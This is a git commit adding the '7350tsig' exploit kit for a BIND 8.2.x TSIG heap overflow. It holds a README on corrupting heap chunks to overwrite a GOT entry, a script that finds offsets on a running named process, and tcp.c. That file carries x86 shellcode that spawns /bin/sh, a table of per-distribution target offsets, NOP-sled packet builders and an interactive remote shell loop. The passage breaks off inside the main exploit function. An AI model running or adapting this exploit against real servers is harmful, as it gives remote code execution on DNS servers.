initial

author: Root THC 2026-02-24 12:42:47 +0000
committer: Root THC 2026-02-24 12:42:47 +0000
commit: c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree: aefc355416b561111819de159ccbd86c3004cf88 /other/tsig
parent: 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
22 files changed, 2997 insertions, 0 deletions
diff --git a/other/tsig/7350tsig.tar.gz b/other/tsig/7350tsig.tar.gz
new file mode 100644
index 0000000..8d41428
--- /dev/null
+++ b/other/tsig/7350tsig.tar.gz
Binary files differ
diff --git a/other/tsig/7350tsig/Makefile b/other/tsig/7350tsig/Makefile
new file mode 100644
index 0000000..6010ccd
--- /dev/null
+++ b/other/tsig/7350tsig/Makefile
@@ -0,0 +1,10 @@
+CC = gcc
+CFLAGS = -Wall -g -ggdb
+OBJS = tcp.o dnslib.o
+all: tsig
+tsig: $(OBJS)
+        $(CC) -o $@ $(OBJS)
+clean:
+        rm -rf $(OBJS) tsig
diff --git a/other/tsig/7350tsig/README b/other/tsig/7350tsig/README
new file mode 100644
index 0000000..da4ce79
--- /dev/null
+++ b/other/tsig/7350tsig/README
@@ -0,0 +1,83 @@
+VULNERABILITY INFORMATION
+The overflow occurs when BIND overwrites your TSIG record with its own, after
+the end of the question section without proper bounds checking.
+The overwritten data appears to be:
+00 00 fa 00 ff 00 00 00 00 ll ll 00 00 00 tt tt tt tt 01 2c 00 00
+id id 00 11 00 00
+where:
+  id is the original dns id
+  ll is the rdlength
+  tt is the time it was signed
+TCP EXPLOITATION INFORMATION FROM SCUT
+With TCP, packet space is allocated on the heap, always in 65536 sized
+chunks. To exploit it one must obtain two packet chunks directly bordering.
+To make named allocate space you must send at least the 2 initial bytes which
+indicate the length of the packet. Creating just 2 allocated packets doesn't
+work because of the many little things which are allocated inbetween
+connections. I still don't have a completely reliable way of getting two
+consecutive packets...
+I overwrite the length with 'id id 00 11' where id is the DNS ID in the header
+of the packet you sent. This is set to 0 of course. The advantage with this
+is PREV_INUSE flag is set, so when its freed it doesnt try to consolidate the
+previous block so the prev_size you just overwrote doesnt matter. The actual
+length of the chunk is now 0x10, so there is 8 junk bytes, and then another
+chunk which you can fully control, woohoo ;) malloc should try and consolidate
+the two 'chunks', which should cause an overwrite.....
+The layout of the 3rd packet after the overwrite will be:
+<prev_size = 0><size = 0x11><junk> ...
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+   Overwritten -^
+  mark previous as in use-.
+                          v
+<prev_size = 0><size = 0x11><retloc - 12><buffer + 12 + 1>...
+  mark previous as not in use-.
+                              v
+<prev_size = 0x10><size = 0x10><junk 8 bytes>
+  mark previous as in use-.
+                          v
+<prev_size = 0><size = 0x11><junk 8 bytes>
+Important - after you send the complete overwrite packet remember to read
+the response frmo the server, it will be about 65545 bytes, otherwise the
+server hangs trying to send you data and the exploit doesn't work.
+OFFSETS
+Getting offsets for the udp simple method is relatively easy, it just takes
+some single stepping skill, and knowledge of basic stack layout. For the
+complex udp method its very difficult and time-consuming, and i don't
+really have a systematic way of doing it.
+TCP is much easier. Just do:
+ltrace -e malloc -p `pidof named`
+as root and watch the output as you create three simultaneous connections
+and send two bytes on each. BIND should allocate memory for each connection
+and the one you want is the second one. Add 13, and this is 'buf_addr' in
+target_t. Then just do:
+$ gdb /usr/sbin/named
+(gdb) disass close
+Dump of assembler code for function close:
+0x8049fa8 <close>:      jmp    *0x80f7230
+0x8049fae <close+6>:    push   $0xa0
+0x8049fb3 <close+11>:   jmp    0x8049e58
+End of assembler dump.
+(gdb)
+The '0x80f7230' is the one you want for 'retloc' in target_t. And thats it!
+Don't you just love the GOT ? :)
+or just use find-offset.sh.....
diff --git a/other/tsig/7350tsig/TODO b/other/tsig/7350tsig/TODO
new file mode 100644
index 0000000..7ecb04c
--- /dev/null
+++ b/other/tsig/7350tsig/TODO
@@ -0,0 +1,2 @@
+Add many connections to create huge padded buffer
+Collect more offsets
diff --git a/other/tsig/7350tsig/dnslib.c b/other/tsig/7350tsig/dnslib.c
new file mode 100644
index 0000000..25bb41c
--- /dev/null
+++ b/other/tsig/7350tsig/dnslib.c
@@ -0,0 +1,270 @@
+#include <stdio.h>
+#include "dnslib.h"
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+int
+dns_mklongdn (u_char *cp, int length)
+{
+        int     orig_len = length;
+        if (length == 0)
+                return (0);
+again:
+        if (length <= 64) {             
+                if (length == 1) {
+                        fprintf (stderr, "fuck...\n");
+                        exit (-1);
+                }
+                *cp++ = length - 1;
+                memset (cp, 'A', length - 1);
+                cp += length - 1;
+                return (orig_len);
+        } else {
+                if (length == 65) {
+                        /* we don't want just 1 byte left over */
+                        *cp++ = 0x3e;
+                        memset (cp, 'A', 0x3f);
+                        cp += 0x3f;
+                        length -= 0x3f;
+                } else {
+                        *cp++ = 0x3f;
+                        memset (cp, 'A', 0x3f);
+                        cp += 0x3f;
+                        length -= 0x40;
+                }
+                goto again;
+        }
+        return (orig_len);
+}
+static void
+hex_dump (unsigned char *buf, int len)
+{
+        if (len > 0x50)
+                len = 0x50;
+        while (len--) {
+                fprintf (stderr, "%01x ", *buf++);
+        }
+}
+void
+dns_debug (unsigned char *buf)
+{
+        HEADER *hdr;
+        unsigned char *orig = buf;
+        unsigned char tmp[1024];
+        int     i;
+        hdr = (HEADER *)buf;
+        fprintf (stderr,
+                "qr = %d\n"
+                "id = %d\n"
+                "opcode = %d\n"
+                "aa = %d\n"
+                "tc = %d\n"
+                "rd = %d\n"
+                "ra = %d\n"
+                "rcode = %d\n"
+                "qdcount = %d\n"
+                "ancount = %d\n"
+                "nscount = %d\n"
+                "arcount = %d\n",
+                hdr->qr, ntohs(hdr->id), hdr->opcode, hdr->aa, hdr->tc,
+                hdr->rd, hdr->ra, hdr->rcode,
+                ntohs (hdr->qdcount), ntohs(hdr->ancount),
+                ntohs (hdr->nscount), ntohs (hdr->arcount));
+        buf += NS_HFIXEDSZ;
+        i = ntohs (hdr->qdcount);
+        while (i--) {
+                u_int16_t type, klass;
+                buf += dns_dn_expand (buf, tmp, orig);
+                NS_GET16 (type, buf);
+                NS_GET16 (klass, buf);
+                fprintf (stderr, "\n%s %d %d\n", tmp, type, klass); 
+        }
+        i = ntohs (hdr->ancount) + ntohs (hdr->nscount) + ntohs (hdr->arcount);
+        while (i--) {
+                u_int16_t type, klass, rdlength;
+                u_int32_t ttl;
+                buf += dns_dn_expand (buf, tmp, orig);
+                fprintf (stderr, "%s ", tmp);
+                NS_GET16 (type, buf);
+                NS_GET16 (klass, buf);
+                NS_GET32 (ttl, buf);
+                NS_GET16 (rdlength, buf);
+                fprintf (stderr, "%d %d ", type, klass);
+                switch (type) {
+                case ns_t_a:
+                        fprintf (stderr, "%s\n", inet_ntoa (*(struct in_addr *)buf));
+                        break;
+                case ns_t_ptr:
+                case ns_t_cname:
+                case ns_t_ns:
+                        dns_dn_expand (buf, tmp, orig);
+                        fprintf (stderr, "%s\n", tmp);
+                        break;
+                default:
+                        hex_dump (buf, rdlength);
+                }
+                buf += rdlength;
+        }
+}
+/* make a full dns query including header. Returns length of packet.
+ */
+int
+dns_mkquery (char *name, u_char *buffer, u_int16_t id, ns_type type, ns_class klass)
+{
+        HEADER *head;
+        head = (HEADER *)buffer;
+        bzero (head, NS_HFIXEDSZ);
+        head->id = htons (id);
+        head->qr = 0;
+        head->opcode = 0;
+        head->aa = 0;
+        head->tc = 0;
+        head->rd = 1;
+        head->ra = 0;
+        head->rcode = 0;
+        head->qdcount = htons (1);
+        head->ancount = 0;
+        head->nscount = 0;
+        head->arcount = 0;
+        return (dns_mkqbody (name, buffer + NS_HFIXEDSZ, type, klass) + NS_HFIXEDSZ);
+}
+/* convert a \0-terminated string to a DNS domain name.
+ * www.yahoo.com(.) => \003www\005yahoo\003\com\000
+ */
+int
+dns_mkdn (char *in, u_char *out)
+{
+        char *start = in, c = 0;
+        int n = strlen (in);
+        in += n - 1;
+        out += n + 1;
+        *out-- = 0;
+        n = 0;
+        while (in >= start) {
+                c = *in--;
+                if (c == '.') {
+                        *out-- = n;
+                        n = 0;
+                } else {
+                        *out-- = c;
+                        n++;
+                }
+        }
+        if (n)
+                *out-- = n;
+        return (strlen (out + 1) + 1);
+}
+/* simple function for making a, ptr and ns resource records
+ * doesn't support more complicated stuph.
+ */
+int 
+dns_mkrr (char *name, u_char *buf, ns_type type, ns_class klass,
+        char *rdata, u_int32_t ttl)
+{
+        int             n;
+        rrec_body       *rec;
+        u_char          *ptr = buf;
+        /* name the resource record pertains too */
+        ptr += dns_mkdn (name, ptr);
+        rec = (rrec_body *)ptr;
+        rec->type = htons (type);
+        rec->klass = htons (klass);
+        rec->ttl = htonl (ttl);
+        rec->rdlength = 0;
+        ptr += 10;
+        switch (type) {
+        case ns_t_a:
+                *(u_int32_t *)ptr = inet_addr (rdata);
+                rec->rdlength = htons (4);
+                ptr += 4;
+                break;
+        case ns_t_ptr:
+        case ns_t_ns:
+                n = dns_mkdn (rdata, ptr);
+                ptr += n;
+                rec->rdlength = htons (n);
+                break;
+        default:
+                /**/
+        }
+        return (ptr - buf);
+}
+/* make just the body of a DNS query.
+ */
+int
+dns_mkqbody (char *name, u_char *buffer, ns_type type, ns_class klass)
+{
+        int len;
+        len = dns_mkdn (name, buffer);
+        buffer += len;
+        NS_PUT16 (type, buffer);
+        NS_PUT16 (klass, buffer);
+        return (len + 4);
+}
+/* uncompress compressed dns names. ugh.
+ * works for normal formatted dns names too..
+ * returns the length of the first part of the compressed name (i.e.
+ * before redirection).
+ */
+int
+dns_dn_expand (u_char *in, char *out, u_char *msg)
+{
+        u_char *start = in, *end = NULL;
+        u_char len;
+        u_int16_t off;
+        while ((len = *in++)) {
+                if (len & NS_CMPRSFLGS) {
+                        if (end == NULL)
+                                end = in + 1;
+                        off = (len & ~NS_CMPRSFLGS);
+                        off |= *in++ << 8;
+                        off = ntohs (off);
+                        in = msg + off;
+                        continue;
+                }
+                memcpy (out, in, len);
+                out += len;
+                in  += len;
+                *out++ = '.';
+        }
+        if (end == NULL)
+                end = in;
+        *out++ = 0;
+        return (end - start);
+}
diff --git a/other/tsig/7350tsig/dnslib.h b/other/tsig/7350tsig/dnslib.h
new file mode 100644
index 0000000..ccf4bfb
--- /dev/null
+++ b/other/tsig/7350tsig/dnslib.h
@@ -0,0 +1,58 @@
+/* dns helper functions by smiler / teso
+ * requires bind 8.x headers now
+ */
+#ifndef DNSLIB_H
+#define DNSLIB_H
+#include <stdlib.h>
+#include <string.h>
+#include <sys/types.h>
+#include <arpa/nameser.h>
+/* little endian macros */
+#define NS_LPUT16(s, blah) { \
+        u_char *p = blah; \
+        *(u_int16_t *)p = s; \
+        blah += 2; \
+} 
+#define NS_LPUT32(s, blah) { \
+        u_char *p = blah; \
+        *(u_int32_t *)p = s; \
+        blah += 4; \
+}
+/* make a fully blown query packet */
+int dns_mkquery (char *name, u_char *buffer, u_int16_t id, ns_type type, ns_class klass);
+/* make a query record */
+int dns_mkqbody (char *name, u_char *buffer, ns_type type, ns_class klass);
+/* convert to dns names, i.e. www.yahoo.com ==> \003www\005yahoo\003com\000 */
+int dns_mkdn (char *in, u_char *out);
+/* uncompress (unchecked) a dns name */
+int dns_dn_expand (u_char *in, char *out, u_char *msg);
+/* make a long dns name fragment (without terminating \000)
+ * provided length > 1
+ */
+int dns_mklongdn (u_char *cp, int length);
+/* print debug information to stderr
+ */
+void dns_debug (unsigned char *buf);
+typedef struct {
+        u_int16_t type;
+        u_int16_t klass;
+        u_int32_t ttl;
+        u_int16_t rdlength;
+} rrec_body;
+/* create a resource record */
+int     dns_mkrr (char *name, u_char *buf, ns_type type, ns_class klass,
+                char *rdata, u_int32_t ttl);
+#endif /* DNSLIB_H */
diff --git a/other/tsig/7350tsig/find-offset.sh b/other/tsig/7350tsig/find-offset.sh
new file mode 100644
index 0000000..2338253
--- /dev/null
+++ b/other/tsig/7350tsig/find-offset.sh
@@ -0,0 +1,87 @@
+#!/bin/sh
+check_util ()
+{
+        for util in $*; do
+                echo -n "checking for $util: "
+                if ! which $util; then
+                        echo "not found, aborting"
+                        exit
+                fi
+        done
+}
+echo "7350 tsig exploit tcp offset finder"
+if [ $# != 2 ]; then
+        echo "usage: $0 /path/to/named/binary pid-of-running-named"
+        echo
+        exit
+fi;
+check_util ltrace objdump gcc
+cat > lala.c << EOF
+#include <stdio.h>
+#include <netinet/in.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+int
+get_connect (void)
+{
+        int     sock;
+        struct sockaddr_in sin;
+        memset (&sin, 0, sizeof(sin));
+        sock = socket(AF_INET, SOCK_STREAM, 0);
+        if (sock < 0) {
+                perror ("socket");
+                exit (-1);
+        }
+        sin.sin_addr.s_addr = inet_addr("127.0.0.1");
+        sin.sin_port = htons (53);
+        sin.sin_family = AF_INET;
+        if (connect (sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
+                perror ("connect");
+                exit (-1);
+        }
+        send (sock, "aa", 2, 0);
+}
+int
+main (int argc, char **argv)
+{
+        get_connect();
+        get_connect();
+        get_connect();
+        return(0);
+}
+EOF
+gcc lala.c -o lala
+ltrace -e malloc -p $2 -o ltrace-log &
+ltrace_pid="$!"
+./lala
+kill -INT ${ltrace_pid}
+cat ltrace-log | head -2 | tail -1 > tmp 
+cat tmp | cut -d '=' -f2 | cut -c4- > ltrace-log
+HEH=`cat ltrace-log| tr 'a-z' 'A-Z'`
+cat > dc << EOF
+16
+o
+16
+i
+EOF
+echo ${HEH} >> dc
+echo "D" >> dc
+echo "+" >> dc
+echo "p" >> dc
+ret_addr=`dc ./dc`
+echo $HEH
+echo "set ret_addr to 0x$ret_addr"
+rm -f ltrace-log tmp lala.c lala dc
+HEH=`objdump --dynamic-reloc $1 | grep " close$" | cut -f1 -d ' '`
+HEH="0x$HEH"
+echo "set retloc to $HEH"
diff --git a/other/tsig/7350tsig/tcp.c b/other/tsig/7350tsig/tcp.c
new file mode 100644
index 0000000..fa942f1
--- /dev/null
+++ b/other/tsig/7350tsig/tcp.c
@@ -0,0 +1,857 @@
+/* coded by smiler / teso
+ *
+ * teso private release - do not distribute
+ *
+ * based on scut's method
+ *
+ * 0.2 added palmers slack 7.1 offsets
+ * 0.3 added scut's huge collection of offsets :)
+ * 0.4 added populator reliability -sc. :)
+ *
+ * feedback welcome, im sure there is a better way to do it than this.
+ */
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <ctype.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <sys/select.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <netdb.h>
+#include <fcntl.h>
+#include <unistd.h>
+#if !defined(__FreeBSD__)
+#  include <getopt.h>
+#endif
+#include "dnslib.h"
+unsigned char   xp_initstr[] = "unset HISTFILE;uname -a;id;\n";
+unsigned char trap_code[] = "\x06\x31\xc0\xfe\xc0\xcd\x80";
+/* peername code that checks the source port connecting
+ * also setsockopts the SO_RCVLOWAT value in case BIND is
+ * waiting for such, which can happen
+ */
+unsigned char peername_code[]=
+        "\x31\xdb\xb3\x07\x89\xe2\xeb\x09\xaa\xaa\xaa\xaa"
+        "\xaa\xaa\xaa\xaa\xaa\x6a\x10\x89\xe1\x51\x52\x68"
+        "\xfe\x00\x00\x00\x89\xe1\x31\xc0\xb0\x66\xcd\x80"
+        "\xa8\xff\x75\x09\x66\x81\x7c\x24\x12\x34\x52\x74"
+        "\x0c\x5a\xf6\xc2\xff\x74\x4f\xfe\xca\x52\xeb\xe2"
+        "\x38\x5b\x31\xc9\xb1\x03\xfe\xc9\x31\xc0\xb0\x3f"
+        "\xcd\x80\x67\xe3\x02\xeb\xf3\x6a\x04\x6a\x00\x6a"
+        "\x12\x6a\x01\x53\xb8\x66\x00\x00\x00\xbb\x0e\x00"
+        "\x00\x00\x89\xe1\xcd\x80\x6a\x00\x6a\x00\x68\x2f"
+        "\x73\x68\x00\x68\x2f\x62\x69\x6e\x8d\x4c\x24\x08"
+        "\x8d\x54\x24\x0c\x89\x21\x89\xe3\x31\xc0\xb0\x0b"
+        "\xcd\x80\x31\xc0\xfe\xc0\xcd\x80";
+/* 34 byte x86/linux PIC arbitrary execute shellcode
+ */
+unsigned char   x86_lnx_execve[] =
+        "\xeb\x1b\x5f\x31\xc0\x50\x8a\x07\x47\x57\xae\x75"
+        "\xfd\x88\x67\xff\x48\x75\xf6\x5b\x53\x50\x5a\x89"
+        "\xe1\xb0\x0b\xcd\x80\xe8\xe0\xff\xff\xff";
+typedef struct target {
+        char    *name;
+        char    *verstr;
+        int     nl;
+        unsigned int ret_addr;
+        unsigned int retloc;
+} target_t;
+/* everything from 8.2 (included) to 8.2.3-REL (excluded) is vulnerable
+ */
+target_t        targets[]={
+        /* XXX: i (scut) think that retloc is always right, just retaddr
+         *      can vary. i guess it varies when using different configurations
+         *      so a way to reduce the effect is to send lots of tcp packets
+         *      with nops + shellcode and then use a retaddr above the one
+         *      returned by smilers script. like you send 10 * 64kb packets,
+         *      just use 0x081n0000, n = [567]
+         *
+         * get the offsets this way:
+         * strings /usr/sbin/named | grep 8.2 | tail -1
+         * md5sum /usr/sbin/named
+         * objdump --dynamic-reloc /usr/sbin/named | grep " close$"
+         * retaddr should be 0x08180000 in all cases
+         */
+        /* bind-8.2.2p5-7.deb, /usr/sbin/named 1ab35b7360bab29809706c2b440fc147 */
+        {"Debian 2.2 8.2.2p5-7 GOT", "8.2.2-P5-NOESW", 0, 0x08180000, 0x080b6d50 },
+        /* bind-8.2.2p5-11.deb, /usr/sbin/named bf5bf8aa378bbb135833f3d924746574 */
+        {"Debian 2.2 8.2.2p5-11 GOT", "8.2.2-P5-NOESW", 0, 0x08180000, 0x080b6f50 },
+        /* bind-8.2.2p7-1.deb, /usr/sbin/named fddc29d50b773125302013cea4fe86cf */
+        {"Debian 2.2 8.2.2p7-1 GOT", "8.2.2-P7-NOESW", 1, 0x08180000, 0x080b70b0 },
+        /* bind-8.2.2P5-12mdk.i586.rpm, /usr/sbin/named 96cb52c21f622d47315739ee4c480206 */
+        {"Mandrake 7.2 8.2.2-P5 GOT", "8.2.2-P5", 1, 0x08180000, 0x080d6a6c },
+        /* RedHat 5.2 uses 8.1.2 */
+        /* bind-8.2-6.i386.rpm, /usr/sbin/named */
+        {"RedHat 6.0 8.2 GOT", "8.2", 0, 0x08180000, 0x080c62ac },
+        /* bind-8.2.1-7.i386.rpm, /usr/sbin/named 9e1efa3d6eb65d1d12e9c3afcb1679de */
+        {"RedHat 6.1 8.2.1 GOT", "8.2.1", 0, 0x08180000, 0x080c3a2c },
+        /* bind-8.2.2_P3*?.rpm, /usr/sbin/named 40ae845243a678a5762a464f08a67ab5 */
+        {"RedHat 6.2 8.2.2-P3 GOT", "8.2.2-P3", 0, 0x08180000, 0x080c5170 },
+        /* bind-8.2.2_P5-9.rpm, /usr/sbin/named a74c76eca6d2bd6ad20a8258e6ba0562 */
+        {"RedHat 6.2 8.2.2-P5 GOT", "8.2.2-P5", 0, 0x08180000, 0x080c56ac },
+        /* bind-8.2.2_P5-25.i386.rpm, /usr/sbin/named ef247e20848ac07a3c5dde1d18d5e201 */
+        {"RedHat 7.0 8.2.2-P5 GOT", "8.2.2-P5", 1, 0x08180000, 0x080f7230 },
+        /* SuSE 6.0 to 6.2 use BIND 8.1.2 */
+        /* bind8.rpm, /usr/sbin/named 4afe958a1959918426572701dd650c4b */
+        {"SuSE 6.3 8.2.2-P5 GOT", "8.2.2-P5", 0, 0x08180000, 0x080d1d8c },
+        /* bind8.rpm, /usr/sbin/named b8f62f57b9140e7c9a6abb12b8cb9751 */
+        {"SuSE 6.4 8.2.2-P5 GOT", "8.2.2-P5", 0, 0x08180000, 0x080d0a8c },
+        /* bind8.rpm, /usr/sbin/named 4aa979a93e5e8b44d316a986d3008931 */
+        {"SuSE 7.0 8.2.3-T5B GOT", "8.2.3-T5B", 0, 0x08180000, 0x080d36cc },
+        {"SuSE 7.1 8.2.3-T9B GOT", "8.2.3-T9B", 1, 0x08180000, 0x080d5ca8 },
+        /* slack 4.0 uses 8.1.2 */
+        /* bind.tgz, /usr/sbin/named 6a2305085f8a3e50604c32337d354ff8 */
+        {"Slackware 7.0 8.2.2-REL GOT", "8.2.2-REL", 0, 0x08180000, 0x080c532c },
+        /* bind.tgz, /usr/sbin/named 1c7436aaab660c3c1c940e4e9c6847ec */
+        {"Slackware 7.1 8.2.2-P5 GOT", "8.2.2-P5", 1, 0x08180000, 0x080bfd0c },
+        {NULL, 0x0, 0x0 },
+};
+int             mass = 0,
+                check_version = 1;
+unsigned char * code = peername_code;
+unsigned int    code_len = sizeof (peername_code);
+int
+sleepvis (int seconds);
+void
+bind_version (struct addrinfo *addr, unsigned char *verbuf,
+        unsigned long int len);
+static int      sc_build_x86_lnx (unsigned char *target, size_t target_len,
+        unsigned char *shellcode, char **argv);
+int
+send_bogus (struct addrinfo *addr);
+int
+send_populators (struct addrinfo *addr, int count);
+int             target_cnt = sizeof(targets)/sizeof(target_t);
+target_t        *vec = &targets[0];
+#if 1
+int
+Xsend (int fd, unsigned char *buf, size_t len, int flags)
+{
+        int     n, tot = len;
+        while (len > 0) {
+                n = send (fd, buf, len, flags);
+                if (n <= 0)
+                        return (n);
+                len -= n;
+                buf += n;
+        }
+        return (tot);
+}
+#else
+#define Xsend send
+#endif
+#if 1
+int
+Xread (int fd, unsigned char *buf, size_t len)
+{
+        int             n, tot;
+        int             pdlen;
+        unsigned char   plen[2];
+        read (fd, plen, 2);
+        pdlen = ntohs (*(u_int16_t *)plen);
+        if (pdlen > len)
+                return (-1);
+        len = pdlen;
+        tot = len;
+        while (len > 0) {
+                n = read (fd, buf, len);
+                if (n < 0)
+                        return (n);
+                len -= n;
+                if (n == 0)
+                        return (len);
+                buf += n;
+        }
+        return (tot);
+}
+#else
+#define Xread read
+#endif
+void
+runshell (int fd)
+{
+        fd_set  rset;
+        int     n;
+        char    buffer[4096];
+        for (;;) {
+                FD_ZERO (&rset);
+                FD_SET (fd, &rset);
+                FD_SET (STDIN_FILENO, &rset);
+                n = select (fd + 1, &rset, NULL, NULL, NULL);
+                if (n <= 0) {
+                        perror ("select");
+                        return;
+                }
+                if (FD_ISSET (fd, &rset)) {
+                        n = recv (fd, buffer, sizeof (buffer), 0);
+                        if (n <= 0) {
+                                perror ("select");
+                                break;
+                        }
+                        write (STDOUT_FILENO, buffer, n);
+                }
+                if (FD_ISSET (STDIN_FILENO, &rset)) {
+                        n = read (STDIN_FILENO, buffer, sizeof (buffer));
+                        if (n <= 0) {
+                                perror ("select");
+                                break;
+                        }
+                        Xsend (fd, buffer, n, 0);
+                }
+        }
+        return;
+}
+int
+get_warez_connection (struct addrinfo *addr)
+{
+        int     s, val = 1;
+        struct sockaddr_in sin;
+        s = socket (addr->ai_family, addr->ai_socktype, addr->ai_protocol);
+        if (s < 0) {
+                return (-1);
+        }
+        if (setsockopt (s, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val)) < 0) {
+                close (s);
+                return (-1);
+        }
+        memset (&sin, 0, sizeof(sin));
+        sin.sin_family = addr->ai_family;
+        sin.sin_port = htons (13394); /* shellcode checks for this... */
+        sin.sin_addr.s_addr = 0;
+        if (bind (s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
+                close (s);
+                return (-1);
+        }
+        if (connect (s, addr->ai_addr, addr->ai_addrlen) < 0) {
+                close (s);
+                return (-1);
+        }
+        return (s);
+}
+int
+get_connection (struct addrinfo *addr)
+{
+        int     s;
+        s = socket (addr->ai_family, addr->ai_socktype, addr->ai_protocol);
+        if (s < 0) {
+                return (-1);
+        }
+        if (connect (s, addr->ai_addr, addr->ai_addrlen) < 0) {
+                close (s);
+                return (-1);
+        }
+        fcntl (s, F_SETFL, O_SYNC | fcntl (s, F_GETFL));
+        return (s);
+}
+/* since a malloc packet is always aligned on an 8 byte boundary we can 
+ * assume at least a 2 byte alignment.
+ * Since (ret+12) is overwritten with garbage we need to jump over that
+ * with each instruction and it also needs to look like a domain name.
+ */
+unsigned char tesops[]=
+        "\x27\x90\xeb\x12\xeb\x12\xeb\x12\xeb\x12"
+        "\xeb\x12\xeb\x12\xeb\x12\xeb\x12\xeb\x12"
+        "\xeb\x12\xeb\x12\xeb\x12\xeb\x12\xeb\x12"
+        "\xeb\x12\xeb\x12\xeb\x12\xeb\x12\xeb\x12";
+/* just nops plus a jump to skip the first byte of the shellcode, note
+ * we shouldn't return into this part, but its relatively small
+ */
+unsigned char finops[]=
+        "\x14\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x01";
+int
+mk_nops (unsigned char *cp)
+{
+        unsigned char *orig = cp;
+        int     ctr;
+        for (ctr = 0; ctr < 1498; ++ctr) {
+                memcpy (cp, tesops, 40);
+                cp += 40;
+        }
+        memcpy (cp, finops, 21);
+        cp += 21;
+        return (cp - orig);     
+}
+int
+mk_overwrite_pkt (unsigned char *cp)
+{
+        unsigned char *orig = cp;
+        HEADER *hdr = (HEADER *)cp;
+        memset (cp, 0, NS_HFIXEDSZ);
+        hdr->id = 0;
+        hdr->rd = 1;
+        hdr->arcount = hdr->qdcount = htons (1);
+        cp += NS_HFIXEDSZ;
+        cp += mk_nops (cp);
+#if 0
+        memcpy (cp, vec->code, vec->code_len);
+        cp += vec->code_len;
+#endif
+#if 1
+        cp += dns_mklongdn (cp, 0xffff - 25 - (cp - orig));
+#else /* harmless, for testing... */
+        cp += dns_mklongdn (cp, 0xffff - 25 - (cp - orig) - 40);
+#endif
+        *cp++ = '\0';
+        NS_PUT16 (ns_t_a, cp);
+        NS_PUT16 (ns_c_in, cp);
+        *cp++ = '\0';
+        NS_PUT16 (250, cp);
+        *cp++ = '\0';
+        return (cp - orig);
+}
+int
+mk_malloc_pkt (unsigned char *cp)
+{
+        unsigned char *orig = cp;
+        memset (cp, 'P', 0x10 - 8);
+        cp += 0x10 - 8;
+        /* fake 1 indicate previous is in use */
+        NS_LPUT32 (0, cp);
+        NS_LPUT32 (0x11, cp);
+        NS_LPUT32 (vec->retloc - 12, cp);
+        NS_LPUT32 (vec->ret_addr, cp);
+        /* fake 2 indicate previous isnt in use */
+        NS_LPUT32 (0x10, cp);
+        NS_LPUT32 (0x10, cp);
+        NS_LPUT32 (0xf4f4f4f4, cp);
+        NS_LPUT32 (0x4f4f4f4f, cp);
+        /* fake 3 indicate previous is in use */
+        NS_LPUT32 (0x0, cp);
+        NS_LPUT32 (0x11, cp);
+        NS_LPUT32 (0xe3e3e3e3, cp);
+        NS_LPUT32 (0x3e3e3e3e, cp);
+        return (cp - orig);
+}
+int
+sleepvis (int seconds)
+{
+        fprintf (stderr, "%2d", seconds);
+        while (seconds > 0) {
+                fflush (stderr);
+                seconds -= 1;
+                sleep (1);
+                fprintf (stderr, "\b\b%2d", seconds);
+        }
+        fprintf (stderr, "\b\b");
+        fflush (stderr);
+        return (0);
+}
+int
+send_bogus (struct addrinfo *addr)
+{
+        int             sock;
+        unsigned char   bogus[2] = "\x00\x00";
+        sleep (10);
+        sock = get_connection (addr);
+        if (sock < 0) {
+                fprintf (stderr, "# looks alright, BIND either crashed or spinning in shellcode\n");
+                return (1);
+        } else {
+                fprintf (stderr, "# BIND is still reacting, either not vulnerable or GOT not triggered\n");
+                fprintf (stderr, "# triggering close()\n");
+        }
+        if (Xsend (sock, bogus, 2, 0) < 0) {
+                perror ("send_bogus:send");
+                exit (EXIT_FAILURE);
+        }
+        close (sock);
+        return (0);
+}
+int
+send_populators (struct addrinfo *addr, int count)
+{
+        int             i;
+        int             sock[64];
+        unsigned char   len[2];
+        unsigned char   dbuf[65536];
+        unsigned int    dbuf_len_tell = 65532;
+        unsigned int    dbuf_len_send;
+        if (count > (sizeof (sock) / sizeof (sock[0]))) {
+                fprintf (stderr, "to keep the balance of sanity is sometimes impossible\n");
+                exit (EXIT_FAILURE);
+        }
+        fprintf (stderr, "sending %d packets, 64kb each. will give %lu bytes of nop space\n",
+                count, (unsigned long int) count * (dbuf_len_tell - code_len));
+        fprintf (stderr, "for each packet we will leave one socket open\n");
+        fprintf (stderr, "[");
+        fflush (stderr);
+        /* build buffer: <jmp-nops> <shellcode> <remspace>
+         * cant be simpler ;)
+         * remspace is not send to the remote side at all
+         */
+        dbuf_len_send = dbuf_len_tell - 64;
+        for (i = 0 ; i < (dbuf_len_send - code_len) ; i += 2) {
+                dbuf[i] = '\xeb';
+                dbuf[i + 1] = '\x12';
+        }
+        for (i = (dbuf_len_send - code_len - 0x20) ;
+                i < (dbuf_len_send - code_len) ; ++i)
+        {
+                dbuf[i] = '\x90';
+//              dbuf[i] = '\xcc';
+        }
+        memcpy (dbuf + dbuf_len_send - code_len,
+                code, code_len);
+        for (i = 0 ; i < count ; ++i) {
+                fprintf (stderr, "%1d", i % 10);
+                fflush (stderr);
+                sock[i] = get_connection (addr);
+                if (sock[i] < 0)
+                        continue;
+                *(u_int16_t *)len = htons (dbuf_len_tell);
+                if (Xsend (sock[i], len, 2, 0) < 0) {
+                        perror ("send_populators:len-sending:send");
+                        exit (EXIT_FAILURE);
+                }
+                if (Xsend (sock[i], dbuf, dbuf_len_send, 0) < 0) {
+                        perror ("send_populators:dbuf-sending:send");
+                        exit (EXIT_FAILURE);
+                }
+        }
+        fprintf (stderr, "]\n\n");
+        fprintf (stderr, "successfully set up populator traps\n");
+        return (0);
+}
+int
+send_expl (struct addrinfo *addr)
+{
+        int     s1 = -1, s2 = -1, s3 = -1, s4 = -1, err = 0;
+        int     owrite_len, mallox_len, blue =0;
+        unsigned char owrite[65536], len[2];
+        unsigned char mallox[0x2000];
+        /* create the packets first */
